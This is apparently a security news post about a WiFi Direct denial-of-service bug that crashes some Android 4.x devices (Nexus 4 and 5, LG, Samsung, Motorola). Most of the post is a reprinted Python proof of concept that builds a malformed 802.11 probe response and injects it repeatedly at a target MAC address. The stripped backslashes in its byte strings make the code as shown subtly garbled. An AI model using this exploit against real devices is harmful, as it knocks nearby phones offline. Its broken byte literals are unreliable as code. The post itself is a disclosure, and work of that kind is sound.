Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

Android Devices are vulnerable to DOS from WiFi Direct vulnerability discovered by Andres Blanco from the CoreLabs

An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class.

Vulnerable Packages include:

. Nexus 5 – Android 4.4.4
. Nexus 4 – Android 4.4.4
. LG D806 – Android 4.2.2
. Samsung SM-T310 – Android 4.2.2
. Motorola RAZR HD – Android 4.1.2

Coresec disclosed the vulnerability on Seclists, the bug is in the modified wpa_supplicant function which provides the interface between the wireless driver and the Android platform.

If the attacker sends a malformed wpa_supplicant value then Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.

Here is the POC example from seclist:

   This PoC was implemented using the open source library Lorcon
   [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
    #!/usr/bin/env python

    import sys
    import time
    import struct
    import PyLorcon2


    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "x50x00"  # Frame Control
        frame += "x00x00"  # Duration
        frame += destination
        frame += source
        frame += source
        frame += "x00x00"  # Sequence Control
        frame += "x00x00x00x00x00x00x00x00"  # Timestamp
        frame += "x64x00"  # Beacon Interval
        frame += "x30x04"  # Capabilities Information

        # SSID IE
        frame += "x00"
        frame += "x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "x01"
        frame += "x08"
        frame += "x8Cx12x98x24xB0x48x60x6C"

        # DS Parameter Set
        frame += "x03"
        frame += "x01"
        frame += struct.pack("B", channel)

        # P2P
        frame += "xDD"
        frame += "x27"
        frame += "x50x6Fx9A"
        frame += "x09"
        # P2P Capabilities
        frame += "x02" # ID
        frame += "x02x00" # Length
        frame += "x21x00"
        # P2P Device Info
        frame += "x0D" # ID
        frame += "x1Bx00" # Length
        frame += source
        frame += "x01x88"
        frame += "x00x0Ax00x50xF2x04x00x05"
        frame += "x00"
        frame += "x10x11"
        frame += "x00x06"
        frame += "fafaxFAxFA"

        return frame


    def str_to_mac(address):
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py  "
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"
            sys.exit(-1)

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        context = PyLorcon2.Context(iface)
        context.open_injmon()

        channel = 1
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
            context.send_bytes(frame)
            time.sleep(0.100)
-----/